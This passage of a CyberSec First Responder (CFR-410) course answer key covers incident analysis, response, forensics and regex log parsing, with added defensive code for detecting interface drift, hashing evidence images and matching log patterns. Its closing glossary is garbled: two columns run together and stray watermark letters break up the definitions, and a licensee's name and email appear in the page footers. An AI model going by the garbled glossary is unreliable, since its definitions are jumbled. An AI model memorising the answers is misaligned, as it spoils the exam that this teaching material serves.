16. How could these tools help you discover and deal with malware?

A: Answers will vary. The netstat command can enable you to find any open or recently closed network
connections that are either malicious or being used in an insecure way. Process Explorer enables you
to find suspicious processes and see how they interface with system DLLs and the Windows Registry.
Registry Editor enables you to further identify a suspicious program's configuration details, including
any changes to the less visible components of the operating system. With any tool, you need a good
working knowledge of Windows' normal operation to make educated decisions about what is and is not
malware.

ACTIVITY 9-2: Analyzing Incidents with Linux-Based Tools

2. How would you change the maximum transmission unit (MTU) for the eth0 interface to 512?

A: sudo ip link set eth0 mtu 512


3. How might you use the ip command to analyze a potential attack?


A: Answers may vary. If any of the interfaces on a host are not configured properly when compared to
their baseline, this could indicate a compromise. Settings like the IP address, MTU, and MAC address
could be altered by an attacker to intercept communications or turn the host into a botnet zombie under
some remote server's control. Abnormal packet transmission totals or excessive packet loss errors
could indicate likewise.
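One practical form of the baseline comparison the answer describes, as an added example that is not from the course: record each interface's MTU and MAC address while the host is known-good, then diff a later reading against it. The baseline and "current" lines here are constructed rather than read from a live host, but they follow the one-line-per-interface shape that `ip -o link show` prints, and the "current" copy has had eth0 changed exactly as the Activity 9-2 command `ip link set eth0 mtu 512` would change it, plus a swapped MAC. The function names are the example's own.

```shell
#!/bin/sh
# Constructed "ip -o link show" output for a known-good host (BASE_LINKS) and
# for the same host later (NOW_LINKS), where eth0's MTU and MAC have changed.
BASE_LINKS='1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000\    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP mode DEFAULT group default qlen 1000\    link/ether 00:11:22:33:44:55 brd ff:ff:ff:ff:ff:ff'
NOW_LINKS='1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000\    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 512 qdisc fq_codel state UP mode DEFAULT group default qlen 1000\    link/ether de:ad:be:ef:00:01 brd ff:ff:ff:ff:ff:ff'

# summarize_links TEXT
# Reduces each "ip -o link" line to "<iface> <mtu> <mac>", locating the mtu and
# link/* fields by name so the flag list and qdisc name do not matter.
summarize_links() {
    printf '%s\n' "$1" | awk '{
        iface = $2; sub(/:$/, "", iface)
        mtu = "?"; mac = "?"
        for (i = 1; i <= NF; i++) {
            if ($i == "mtu") mtu = $(i + 1)
            if ($i ~ /^link\//) mac = $(i + 1)
        }
        print iface, mtu, mac
    }'
}

# link_drift BASELINE CURRENT
# Prints one line per setting that differs from the baseline:
#   <iface>: mtu <old> -> <new>   or   <iface>: mac <old> -> <new>
# and notes interfaces that have disappeared. Silent when nothing changed.
link_drift() {
    base=$1
    now=$2
    summarize_links "$base" | while read -r iface mtu mac; do
        cur=$(summarize_links "$now" | awk -v i="$iface" '$1 == i { print $2, $3 }')
        if [ -z "$cur" ]; then
            echo "$iface: missing in current state"
            continue
        fi
        cur_mtu=${cur%% *}
        cur_mac=${cur#* }
        [ "$mtu" = "$cur_mtu" ] || echo "$iface: mtu $mtu -> $cur_mtu"
        [ "$mac" = "$cur_mac" ] || echo "$iface: mac $mac -> $cur_mac"
    done
}

link_drift "$BASE_LINKS" "$NOW_LINKS"
```

On a real host the baseline is captured once with `ip -o link show > baseline.txt` and the current state fed in the same way; an unexpected MAC change is the setting most worth alerting on, since it is what an interception setup needs, while MTU drift more often points to tunnelling or misconfiguration.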

6. How might you use the top command to detect malicious activity?

A: Answers may vary, but one of the most common ways to detect malicious activity is by watching the
memory and CPU usage of processes running on the system. You may be able to spot suspicious
processes that are taking up too many resources.

10. What other Linux tools and commands could you use to search the capture if you didn't have
access to Wireshark?

A: Answers may vary, but using grep to search the capture for specific addresses, protocols, or other
details, and cut to trim the output, would be useful.

ACTIVITY 9-3: Analyzing Indicators of Compromise

2. What can you conclude about the account listed in the results?

A: It hasn't been used yet, and appears to have been created as a backup or backdoor method for
access to the domain. The DC administrators may be helpful in verifying this account's purpose.

3. Assuming this account was created or used by an attacker, what could the attacker have done to
make it harder to spot as malicious?

A: The attacker could have given it a name more relevant to the company, especially if the company
has specific account naming conventions. Limiting the account's privileges may also make it less likely
to be monitored or audited.

9. What remote changes did Windows detect to the DT_Watch directory?

A: Windows logged everything associated with accessing the directory, even the directory listing
commands.

10. Why is this level of auditing impractical for commonly used folders?

A: Answers may vary, but the volume of logs would be incredibly difficult, if not impossible, to manage.

11. What type of security solution would be better at detecting unauthorized changes in files and
configurations?

A: Answers may vary, but a host-based intrusion detection system/host-based intrusion prevention
system (HIDS/HIPS) or file integrity monitors (FIMs) are suited to this kind of security control.

12. What other IOCs might you have left behind?

A: Answers will vary, but could include: excessive login failures, unexplainable gaps in logs, unusual
levels of ICMP traffic or other networking protocols, unusually high access rates to the Administrator
account, and so on.


ACTIVITY 10-1: Developing an Incident Response System

2. What members of the organization will help you deal with the current incident? Which others would
you routinely include in the CSIRT?

A: Answers will vary, but management, IT, human resources, and physical security might routinely be
included here.

4. Which of these questions can you answer now?

A: Answers will vary, but might include basics of the event, timestamps, some locations (internal at
least), and the fact the incident is unsolved.

5. What additional questions would you ask about the incident based on what you know so far?

A: Answers will vary, but they might include: Who is in the office today? What files were taken? Is there
any evidence of proprietary information being posted publicly?

ACTIVITY 10-2: Identifying and Analyzing an Incident

1. What else should you and your team collect that will help you understand what happened?

A: Answers will vary. The team will need to collect any network logs that list remote access events. The
team discovered the remote IP address (67.240.182.117), but any additional information, like the
number of connection attempts, or any past activity by this IP address, will be valuable. On a network
level, the team should also identify any intrusion detection/prevention activity that generates alerts. If
the affected server has any anti-malware or HIDS/HIPS running, the team should also consider any
alerts from these as incident-related data. The team can also consult its SIEM solution to see if any
anomalous activity was detected in its log analysis duties. At this point, the team doesn't know what, if
anything, was done to the server or network. All of these tool-assisted records can help them piece
together the extent of the damage. Beyond technical sources of data, others in the team should also
start interviewing all relevant employees. Charles needs to describe every step that he took when he
tried signing in to his account, as well as who he contacted to get that resolved, and when. The help
desk employee needs to corroborate this information. Likewise, you should confiscate Pat's
workstation. It may be helpful to try contacting Pat as well and explaining the situation. Any surveillance
camera footage around the time of Pat's computer accessing the server should also be gathered.
What's more, you should determine if anyone else was in the building before 8:00 a.m. and witnessed
any unusual behavior, especially around Pat's desk.

2. What, if anything, does this tell you about a potential incident?

A: Unfortunately, not much. A fact of incident analysis is that not every indicator or source of information
will be relevant or even accurate. This could indicate that someone specifically used this IP address
because they knew it had no history that could be traced back to them; or, it might simply mean that it
was the user's first time ever accessing a remote computer in the domain from that IP address.


3. What does this suggest happened?

A: It suggests, but does not prove, that the user was simply guessing the password to Charles' account.
After too many failed guesses, security measures kicked in and locked the account. Because Charles
denies he tried to log in last night, it seems unlikely that Charles himself forgot his password or mistyped
it over and over again. Thus, the team can reasonably conclude that someone attempted to use
Charles' account as a way to log in to the research and development server remotely.

4. What does this suggest about the role of Pat's account and workstation in the incident?

A: It suggests the attacker merely found the password Pat wrote down and put in the drawer, and then
used that to log in to the account at Pat's workstation.

5. What practices should the team put in place for this important phase of the response?

A: Answers will vary. The team should have a baseline already in place for normal behavior on both a
network level and on the affected host. This will make detecting a deviation from the norm much easier.
The team has already done some log correlations, but it also needs to go further and make sure that it
knows exactly what happened on the network and the host at specific times. A SIEM solution can assist
the team in doing this, if available. The team can also make their jobs easier by filtering out irrelevant
data they've collected, which often becomes apparent during the analysis phase. Any alerts generated
by IDSs at key times may also confirm the nature of a possible attack, especially if any reconnaissance
was done prior to the incident.

6. What might this suggest?

A: It could suggest that the person who logged in to Pat's workstation attempted to remove data from
that workstation. It could also suggest that the person loaded something onto the server.

7. What does this suggest?

A: It suggests that a sensitive document was quickly exfiltrated from the research and development
server and moved to a different host—most likely Pat's workstation—as it was the only account signed
in at the time. The document was then deleted from Pat's workstation.

8. What do you believe has happened?

A: Answers may vary, but essentially, you might say something along these lines: An attacker attempted
to use Charles' account to connect remotely to the internal research and development server. The
attacker failed. Later, in the early morning before most people made it in to the office, the attacker
physically went to Pat's desk, discovered the password written down in a drawer, and used it to log in to
the workstation and the remote server. While in the remote server, the attacker transferred sensitive
product files to Pat's workstation, where the attacker then copied the file to a removable drive. The
attacker deleted the file from Pat's workstation, ejected the removable drive, and left. The organization's
data has been breached.


ACTIVITY 10-3: Containing, Mitigating, and Recovering from an Incident

1. What are some containment and mitigation strategies you'd perform on this incident to stop a data
breach from continuing or reoccurring?
A: Answers will vary. Some devices, like Pat's workstation and the research and
development server, have been collected for analysis. They should stay disconnected
and isolated from the wider network in case the attacker has a backdoor communication
channel into these devices. When the CSIRT is ready, they should also perform malware
scans on the isolated systems to determine if any filtering needs to be applied to the
wider network. If the attack was assisted by malware, the team needs to block the source
of that malware using whatever method they deem to be appropriate. Both Charles and
Pat should have their domain accounts disabled for now, so the attacker cannot continue
to use them as vectors. Network access to other servers that hold sensitive information
should also be actively monitored or completely denied, depending on how significantly
this will impact business needs.

2. What likely cannot be contained by the CSIRT team as a result of this breach?
A: If the attacker was able to exfiltrate data onto a USB drive and leave the building with
it, they could have distributed it in any number of ways. If the design document falls into
the hands of a competitor or is uploaded to the public Internet, it will be very difficult, if not
impossible, to fully contain the breach.
e
3. How would you recover the functionality that the research and development server provided, such
as serving documents about upcoming Develetech products, as well as the functionality of Pat's
workstation?
A: Answers will vary. Some may argue that, because the systems are both clean of
malware, and the only point of compromise at the moment is user accounts that have
been disabled, it is safe to push both computers back into production. However, without
the full picture of the incident, it would be premature to say there couldn't be other points
of compromise that the team doesn't yet know about. Likewise, both devices may need to
be treated as evidence in an upcoming investigation, so pushing them back out rather
than keeping them quarantined would hurt that investigation. Instead, it would be best to
recover the latest backup copy of the research and development server, put that backup
image on a different machine, and use that as the live production environment for now.
The backup chosen should predate the first suspicious activity, and the restored server
should come up with the compromised credentials already disabled. The IT department
can provision a temporary workstation for Pat while the normal one is quarantined.

4. When it comes to Charles' and Pat's disabled user accounts, how will you
approach recovery?
A: Answers will vary. The team may decide to restore Charles' account immediately, as it appears the
attacker only knew his user name, and not his password. His user name is likely common knowledge in
the company or easily guessable anyway. Therefore, anyone with access to the research and
development server could have been a target without having done anything necessarily wrong. Even
so, a precautionary password reset for Charles costs little and removes any doubt about whether one
of the guesses was close. On the other hand, Pat's account is compromised and it needs a password
change before it can be re-enabled. However, even before that, it would be a good idea to ensure that
Pat is trained on proper end-user security practices, and should be reacquainted with the
company-specific policy regarding passwords and password storage. The human factor is one of the
weakest points in the security of any organization, and writing passwords down and putting them in an
unlocked drawer is certainly not an acceptable practice. Until Pat has demonstrated a willingness to
comply with security policies and guidelines, the account should stay disabled.

5. What lessons have you learned from this incident, what suggestions do you
have so that an incident like this is prevented in the future, and what other
content should be in the report?
A: Answers will vary. The AAR should clearly outline what actions the CSIRT took in its incident
handling procedures. This includes every step, from identification and analysis, to containment and
eradication, and then to recovery. The report should justify the actions the team took, and, if applicable,
should admit if there were more efficient and accurate ways of handling the incident. Finally, the team
needs to ask itself what should change as a result of this incident. The suggestions they put forth could
include: encrypt the research and development server and every other server that holds sensitive data;
disable USB ports on certain at-risk hosts; mandate company-wide training for end users on best
security practices; draft policies that mirror this training, especially concerning best usage of passwords
and the storage of those passwords; and, if feasible, implement a DLP solution on the research and
development server so that any attempted exfiltration of data will be denied.
ACTIVITY 10-4: Handing Over Incident Information to a Forensic Investigation

1. How do the goals of a forensic investigator differ from those of a first responder?
A: Answers may vary, but the most clear difference is that a first responder is concerned with detecting
an incident and stopping it, thus returning operations to normal; whereas a forensic investigator is
focused on evidence, as well as understanding the nature of an incident to pursue punitive actions or
determine that no such action should be taken.

2. Despite the differences in goals, how do the two disciplines overlap?
A: Answers may vary, but both an incident responder and a forensic investigator will need to be involved
in securing and isolating assets, sharing information about the possible source and vector of an attack,
and reconstructing a timeline of events surrounding and including the incident.

3. What are some of the best practices that you can employ when communicating your results to
Develetech's forensic team?
A: Answers will vary. First, the CSIRT will want to designate a liaison. Although both teams can meet as
a whole, this liaison will be an ongoing point of contact for the forensic team to consult with. This point of
contact should be the authoritative voice of the team, able to bridge both the needs of the CSIRT and
those of the forensic team. The CSIRT should also communicate the scope of the incident: every asset
affected, every employee involved, and so on. This will ensure that the forensic team does not have an
incomplete picture from which to draw evidence. It's also important that the CSIRT describe the
techniques and tools they used to contain and mitigate the incident, as these could end up affecting the
investigation.


4. What specifically do you need to give the forensic team so they have all the information they need to
do their work?
A: Answers may vary, but you need to send them all the relevant event and network logs
from that morning and the failed remote connection attempt from the night before; hand
over custody of Pat's workstation and the research and development server, along with a
list of activities the CSIRT performed on these assets; and give them the AAR that details
exactly what you know so far about the incident.

ACTIVITY 11-1: Applying a Forensic Investigation Plan

1. What must you know about Develetech's computing environments to prepare for a forensic
investigation?
A: Answers will vary. You need to know the following about the systems affected by the
incident: the type of hardware in place; the operating systems and other software used on
the computers; any environments that may have been virtualized versus those that are
physical; the forensic tools of the trade that can assist you in your duties; any of
Develetech's systems that must stay active during an investigation to support business
needs; and all applicable laws and regulations that could impact your work.

2. How can an analysis of these anti-malware logs help your investigation?
A: Answers may vary, but the team might be able to discover identifying information from
the titles of the other files on the USB drive. This could lead them to the culprit or at least
the owner of the USB drive.

3. What are some of the important steps involved in upholding the integrity of your investigation? How
can you better convince your audience of your findings?
A: Answers may vary, but observing the chain of custody is a must for any investigation.
The movement of Pat's workstation and the research and development server should be
documented based on who last worked with each computer and what exactly was done.
This process should be ongoing. Furthermore, you need to consider how the evidence
you found so far can be authenticated. You need to demonstrate to your supervisor, and
possibly to law enforcement in the future, that the evidence you gathered has not been
tampered with. One example is by hashing the images of each drive so that an outside
party can verify that hash when the evidence makes its way into their custody.

ACTIVITY 11-2: Securely Collecting Electronic Evidence

2. Why is it important to take note of the hash value of the drive image?
A: A hash value supports integrity of evidence; when the drive image moves down the
chain of custody, the actual hash can be compared to the expected value. If they match,
the forensic analyst or court official can confirm that the evidence was not tampered with
during this time. Record the hash at acquisition, with a current algorithm such as SHA-256,
and keep it somewhere other than with the image itself; a match shows the image has not
changed since acquisition, not that the acquisition itself was sound.
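Hashing the images, as the answers to Activity 11-1 question 3 and the question above describe, as an added example (my own code, not the course's or any forensic tool's): hash a drive image in fixed-size chunks, record the digest in an append-only custody log together with who handled the image and when, and re-verify it later against the acquisition entry. The demo builds a few kilobytes of fake sector data as a stand-in for an image and then flips one bit to show that verification fails. The file names and the JSON-lines record format are assumptions for the illustration.

```python
import hashlib
import json
import tempfile
from datetime import datetime, timezone
from pathlib import Path

CHUNK = 1024 * 1024  # hash in 1 MiB pieces so a multi-GB image never has to fit in memory


def hash_bytes(data, algorithm="sha256"):
    """Digest of an in-memory byte string; used to sanity-check hash_image."""
    return hashlib.new(algorithm, data).hexdigest()


def hash_image(path, algorithm="sha256"):
    """Stream a drive image through the hash function and return the hex digest."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def record_custody(image_path, record_path, handler, note):
    """Append one entry (who, when, what, current hash) to a JSON-lines custody record.
    The record format is an assumption for this example, not a standard."""
    entry = {
        "image": Path(image_path).name,
        "sha256": hash_image(image_path),
        "handler": handler,
        "note": note,
        "time_utc": datetime.now(timezone.utc).isoformat(timespec="seconds"),
    }
    with open(record_path, "a", encoding="utf-8") as f:
        f.write(json.dumps(entry) + "\n")
    return entry


def verify_image(image_path, record_path):
    """Compare the image's current hash with the acquisition hash (first record entry)."""
    with open(record_path, encoding="utf-8") as f:
        acquisition = json.loads(f.readline())
    actual = hash_image(image_path)
    return actual == acquisition["sha256"], acquisition["sha256"], actual


def demo():
    """Acquire -> verify -> tamper -> verify again, on a constructed stand-in for an image."""
    with tempfile.TemporaryDirectory() as d:
        img = Path(d) / "pat_ws_disk.img"             # assumed file name
        rec = Path(d) / "pat_ws_disk.custody.jsonl"   # assumed record name
        # A few KB of fake "sector" data, not a real disk image.
        img.write_bytes(b"\x00" * 4096 + b"DT_Watch_images/dt-w1_product_specs.pdf" + b"\xff" * 4096)
        record_custody(img, rec, "analyst A", "acquired image of Pat's workstation drive")
        ok_before, expected, _ = verify_image(img, rec)
        # Simulate tampering in transit: flip one bit in the middle of the image.
        data = bytearray(img.read_bytes())
        data[2048] ^= 0x01
        img.write_bytes(data)
        record_custody(img, rec, "analyst B", "received image for analysis")
        ok_after, _, actual = verify_image(img, rec)
        return ok_before, ok_after, expected != actual


if __name__ == "__main__":
    print(demo())  # (True, False, True)
```

Verification always compares against the first entry, the acquisition hash, rather than the latest one; otherwise a handler who altered the image could simply append a fresh entry that matches. In practice the custody record would live on separate, write-protected storage from the image for the same reason.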


3. What kinds of important metadata are usually collected in a drive image such
as this one? How can this metadata shape your investigation?
A: Answers may vary, but metadata can include: directory structure, file locations, file sizes, and the
date a file was created/last modified. This metadata can help a forensic analyst correlate data and come
to understand the bigger picture of an incident.

4. When it comes to keeping this drive image secure, what sort of preservation
techniques would you recommend?
A: Answers will vary. Because data is virtual, and must depend on physical hardware, it's a good idea to
replicate this image across more than one physical medium in case one were to fail. The rooms in which
you store these physical media should be locked and climate controlled.

ACTIVITY 11-3: Analyzing Forensic Evidence

6. Focusing on just the non-deleted files, what does this tell you about Rupert's
interests? Is there anything incriminating so far?
A: Rupert seems to be interested in video games, as the drive includes various files related to them.
That's obviously not incriminating by itself, but it may suggest that he was wasting company time and
resources if he was using this drive at work. More interestingly, the drive includes the
my_contract_invoice3.docx file that the CSIRT identified earlier as being correlated with Pat's breached
workstation. There's also a ZIP file with the somewhat suspicious name of nethack-360-win-x86-2.zip.

8. What is this program? Is it incriminating?
A: NetHack is an old text-based dungeon crawler video game. Despite its name, it's not useful for
malicious purposes, so there's nothing really incriminating about it. Red herrings like this are always a
possibility in forensic work.

10. Just by looking at the list of names, what can you tell about what was deleted
from this USB drive?
A: Several files and one folder were deleted. The folder is called DT_Watch_images, and the files have
various names, some of which appear incomplete. It may be possible to guess the contents of some of
the files based on their names and file extensions. For example, dt-w1_product_specs.pdf is likely the
product specification document for Develetech's smartwatch.

12. How will using this tool help you in your case against Rupert?
A: It enables a detailed analysis of information from drive images and gives an investigator the ability to
write notes about content and examine evidence without risking contamination of the original evidence.

13. Considering all of your work so far, how confident are you of Rupert's
involvement in the incident?
A: Answers will vary. Some will think the evidence is overwhelmingly suggesting that Rupert attempted
to steal sensitive data from the company and then cover his tracks. Others may hold out on committing
to a final judgment, and will want to see if there is any more evidence that could make them more
certain.

14. Given the nature of the evidence you've analyzed, what would you suggest
Rupert's intentions were?
A: Answers will vary, but assuming his coworkers' testimony is accurate, Rupert was likely intending to
sabotage Develetech, either by giving away its secrets or by selling those secrets to a competitor.


ACTIVITY 11-4: Conducting Post-Mortem Activities

1. Based on your findings of the data breach incident, what would you
include in this report?
A: Answers will vary. A useful report includes the following information: who authorized
the investigation, the focus of the investigation, the specific people and systems you
investigated, what you found, and how it all comes together. For the data breach incident,
you may choose to begin the report by stating that you were authorized to perform the
investigation by the CISO of Develetech, and that you were tasked with finding out what
data was breached and who was responsible. The assets that the team investigated
were: Pat's workstation, the system and anti-malware logs on that workstation, the
research and development server, the system and network logs of that server, the
network logs of various other devices, the people who were indirectly affected by the
incident (Charles and the help desk employee), one of the victims (Pat), and the primary
suspect (Rupert). What you found is evidence of a failed remote login attempt, evidence
of a remote connection from inside the network using certain credentials (Pat's), network
logs supporting these connection attempts, host and anti-malware logs indicating that
sensitive files were transferred off the research and development server, the USB drive
with those files on them, and more. You could then likely end with a way to pull it all
together, constructing a single narrative of events as implied by the evidence you found.
This narrative should go step-by-step and explain how Rupert breached the server, why
he did so, and what he might have done with this stolen data.

2. If Develetech decides to press charges, what can you do to help this initiative?
A: Answers may vary, but a forensic investigator should research the laws that govern the
organization, including specifically which laws may have been broken as a result of the
data breach. If legal counsel advises the company to press charges, you can further tailor
your report to speak to the applicable laws. For example, some laws will place greater
value on certain types of evidence, so you'll want to make sure the report focuses on that
evidence so that it clearly illustrates how the law was broken.

3. How would you suggest collaborating with this non-technical audience?
A: Answers will vary. It's important that the liaison clearly understands what law
enforcement officials expect of them, and likewise, communicates what they expect of the
officials. This will enable you to exchange information and evidence without issue. Also,
you shouldn't expect that local law enforcement will provide a comprehensive level of
assistance to your investigation; you may need to do most of the remaining work
internally. Still, some agencies (particularly federal ones) may have tools at their disposal
that you do not. You should take advantage of these tools wherever possible.

ACTIVITY B-1: Parsing Log Files with Regular Expressions

1. How would you write a regular expression to capture all possible ZIP codes?
A: The simplest way to write this expression is \d{5}—this searches for any combination
of five digits.


2. How would you write a regular expression to capture all of these extended ZIP codes?
A: The expression \d{5}-\d{4} does the job.

3. In the ZIP code example, what if you wanted to capture all possible five-digit ZIP codes or any
extended ZIP codes?
A: You can use the "OR" logical operator to do this. The expression could be something like
\d{5}-\d{4}|\d{5}—this basically combines the two previous expressions using the pipe symbol to
indicate an alternative. The longer alternative is listed first on purpose: most engines try alternatives
from left to right, so \d{5}|\d{5}-\d{4} would stop after the first five digits of an extended code. The
equivalent \d{5}(?:-\d{4})? says the same thing with an optional group.

4. In the following space, write a regular expression that searches for these messages, regardless of
capitalization.
A: A basic example is /error|fail/i, where the i flag makes the match case-insensitive. Because the
pattern is not anchored, fail also matches Failed and failure. In a tool that does not use the slash and
flag notation, use its own case-insensitive option (for example grep -i) or the (?i) inline modifier where
the engine supports it. Note that fail* would not do what it appears to: the * applies only to the final l,
so it matches fai as well as fail.

5. What do all email addresses share in common? What, if anything, can remain static in this
expression? What characters will you need to escape? Does the expression need to be perfect?
A: All email addresses are in the basic format localname@domain.tld. The length and specific character
requirements may vary; for example, the older top-level domains are two to four characters long
(although many newer ones are longer), the entire address is usually not allowed to be over 255
characters, and some systems do not allow certain special characters. Still, the @ symbol and the
period are always going to be in an email address. Beyond this, nothing is really static, as you're trying
to search for all possible addresses. The only real character you need to escape is the period before
the top-level domain. The expression doesn't need to be perfect, and you may not even need to pay
attention to character limits in the local name and domain sections.

6. In the following space, write out your regular expression to capture everything in an email address
format.
A: A basic example is .+@.+\.[a-z]{2,4}—this works for most email addresses, but may not
include some of the latest top-level domain suffixes. Be aware that .+ is greedy and matches anything
except a line break, so on a log line that holds other text the match will start at the beginning of the
line rather than at the address. [^\s@]+@[^\s@]+\.[a-z]{2,} is a tighter version that stops at
whitespace and drops the upper bound on the suffix length.

7. Write a regular expression that will capture all possible IP addresses. Remember, your expressions
don't need to be perfect to be functional.
A: A basic example is (\d{1,3}\.){3}\d{1,3}—though this example would allow illegal IP
addresses (greater than 255 for an octet, for example). This may be good enough for your purposes,
however, as you are unlikely to encounter invalid IP addresses in your logs. Wrapping it in word
boundaries, \b(\d{1,3}\.){3}\d{1,3}\b, keeps it from matching the first part of a longer dotted
number; if you do need to reject out-of-range octets, it is usually easier to check each octet in code
after the match than to encode the 0 to 255 range in the expression.

8. When would you use regular expressions rather than normal searches in logs?
A: Answers will vary, but may include searching for any string that you know only part of; version
numbers; timestamps; IP addresses; port numbers; user names; and more.
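The patterns from questions 1 through 8 run over a handful of constructed log lines, as an added example that is not part of the course (the lines, hosts, addresses and people are made up). It shows the alternation-order point from question 3, the case-insensitive flag from question 4, a tighter email pattern than the .+ form in question 6 (built from word characters so it does not swallow the rest of the line, and without the {2,4} ceiling on the suffix), and the loose IPv4 pattern from question 7 next to a strict check that rejects octets above 255. The port number in the sshd line shows up as a ZIP code false positive, which is the "doesn't need to be perfect" caveat in action.

```python
import re

# Constructed log lines for the exercise (made up; hosts, addresses and people are not real).
SAMPLE_LINES = [
    "2019-03-12 06:15:03 app=crm msg=Customer record updated zip=14623 email=pat@develetech.example",
    "2019-03-12 06:15:09 app=crm msg=Shipping address zip=14623-1234 email=c.smith@mail.example.co",
    "2019-03-12 06:16:10 app=sshd msg=Failed password for charles from 203.0.113.7 port 51522 ssh2",
    "2019-03-12 06:16:12 app=sshd msg=ERROR: maximum authentication attempts exceeded for charles from 203.0.113.7",
    "2019-03-12 06:17:55 app=fw msg=Accepted connection 10.10.20.45 -> 10.10.20.300 (last octet invalid on purpose)",
]

# Q1-Q3: plain or extended ZIP. Equivalent to \d{5}-\d{4}|\d{5}; the optional group plays the
# role of "longer alternative first". \b keeps it from matching inside longer digit runs.
ZIP_RE = re.compile(r"\b\d{5}(?:-\d{4})?\b")
# Q4: unanchored, so "fail" also hits Failed/failure; the flag replaces the /i suffix.
ERR_RE = re.compile(r"error|fail", re.IGNORECASE)
# Q5-Q6: tighter than .+@.+\.[a-z]{2,4}: no greedy .+, and no upper bound on the suffix length.
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)*\.[a-z]{2,}", re.IGNORECASE)
# Q7: the course's loose pattern, with word boundaries; it still accepts octets > 255.
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def find_zips(line):
    return ZIP_RE.findall(line)


def is_error_line(line):
    return ERR_RE.search(line) is not None


def find_emails(line):
    return EMAIL_RE.findall(line)


def find_ips(line, strict=False):
    """Return IPv4 candidates; strict=True drops any with an octet above 255."""
    hits = IPV4_RE.findall(line)
    if not strict:
        return hits
    return [ip for ip in hits if all(int(octet) <= 255 for octet in ip.split("."))]


def summarize(lines):
    """Apply every pattern to every line and collect the matches by kind."""
    return {
        "zips": [z for l in lines for z in find_zips(l)],
        "error_lines": [l for l in lines if is_error_line(l)],
        "emails": [e for l in lines for e in find_emails(l)],
        "ips_loose": [ip for l in lines for ip in find_ips(l)],
        "ips_strict": [ip for l in lines for ip in find_ips(l, strict=True)],
    }


if __name__ == "__main__":
    for kind, matches in summarize(SAMPLE_LINES).items():
        print(f"{kind}: {matches}")
```

The strict IP check is done in Python after the match rather than in the expression itself; a regular expression that encodes the 0 to 255 range for each octet exists but is much harder to read and to maintain than a one-line comprehension. The same split applies to ZIP codes: if the port-number false positive matters, filter on the field name (zip=) in code instead of making the pattern cleverer.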
Glossary

e
ut
ib
AAR APT
(after-action report) A document that (advanced persistent threat) An attack that

tr
includes an analysis of security events and remains covert over a long period of time.
incidents that can provide insight into how

is
to enhance security for the future. armored virus
A virus that obscures its true location in a

D
account management system by misleading the anti-malware
A common term used to refer to the system into thinking it resides elsewhere.
processes, functions, and policies used to

organization. or
effectively manage user accounts within an ARO
(annual rate of occurrence) How many
times per year a particular loss is expected
administrative controls
e
to occur.
Security measures implemented to monitor
at

the adherence to organizational policies ARP


and procedures. (Address Resolution Protocol) The
lic

mechanism by which individual hardware


adware MAC addresses are matched to IP
Software that automatically displays or addresses on a network.
up

downloads unsolicited advertisements


when it is used. ARP poisoning
An attack in which an attacker redirects an
ALE IP address to a MAC address that was not
D

(annual loss expectancy) The total cost of a its intended destination.


risk to an organization on an annual basis.
ARP spoofing
ot

anomaly analysis See ARP poisoning.


The process of defining an expected
ATT&CK
N

outcome or pattern to events, and then


identifying any events that do not follow (Adversarial Tactics, Techniques, and
these patterns. Common Knowledge) A resource for
o

listing and explaining specific post-attack


anti-forensics techniques. Maintained by the MITRE
D

The process by which an attacker impedes Corporation.


a forensic investigation.

Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M


510 | CyberSec First Responder® (Exam CFR-410)

attack surface bastion host


All of the various vulnerable points in a A network host that connects a trusted
system through which an attacker can security zone to a trusted security zone or
launch an attack. an untrusted zone to a trusted zone and
provisions specific resources from within
attack tree the trusted zone to external users or
A graphical representation of threat devices requesting those resources.
modeling in which an attacker's goal is
positioned in relation to the attack vectors BCP

e
used to achieve that goal, and possibly any (business continuity plan) A plan that

ut
mitigation techniques the security details exactly how an organization ought
professional can employ to prevent or stop to continue day-to-day operations in the
the attack. event of a disaster that causes at least one

ib
critical operation to fail.
attack vector

tr
The method or path that an attack takes. beaconing
The process by which a bot in a botnet

is
auditing sends its status (a "heartbeat") to a
A detailed and specific evaluation of a command and control server to indicate

D
process, procedure, organization, job that it is "alive."
function, or system, in which results are
gathered and reported to ensure that the behavioral analysis

legal responsibilities.
or
target of the audit is in compliance with
the organization's policies, regulations, and
The process of identifying the way in
which an entity acts, and then reviewing
future behavior to see if it deviates from
the norm.
e
authorization
at

The process of determining what rights BIA


and privileges a particular entity has, (business impact analysis) Identifies
usually after the system has authenticated present organizational risks and determines
lic

them. the impact to ongoing, business-critical


operations and processes if such risks
availability actually occur.
up

The fundamental security goal of ensuring


that services function correctly and big data
consistently without outages or denial of Data collections that are so large and
D

service. complex that they are difficult for


traditional database tools to manage.
backdoor
ot

A method by which an attacker bypasses bit-stream imaging


authentication to gain access to a system. The forensic process of capturing a bit-for-
N

bit copy of a piece of media.


baiting
A form of social engineering in which an black box
o

attacker leaves infected physical media in A pen testing approach that simulates an
an area where a victim finds it and then outside attacker that knows little to
D

inserts it into a computer. nothing about the target. The pen tester
must do their own reconnaissance.
Bash
A command shell and scripting language black hole
for Unix-like systems. A component of network architecture that
drops any packets it receives, without
alerting the source.

Glossary
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 511

blacklisting CBEST
The process of blocking specific systems, A penetration testing framework created by
software, services, and more, from using a CREST that is geared toward the UK financial
resource. Anything not on the list is allowed. sector.

Bluetooth CDM
A wireless technology that facilitates short- (Continuous Diagnostics and Mitigation) A
range wireless voice and data communications program created by the Department of
between devices. Homeland Security to identify threats,

e
prioritize those threats in terms of the risks

ut
bot they pose, and then give security personnel the
A machine that has been infected as part of a ability to triage these threats, all on an ongoing
botnet. basis.

ib
botnet CESG

tr
A set of computers that has been infected by a (Communications–Electronics Security Group)
control program that enables attackers to An organization within the UK government

is
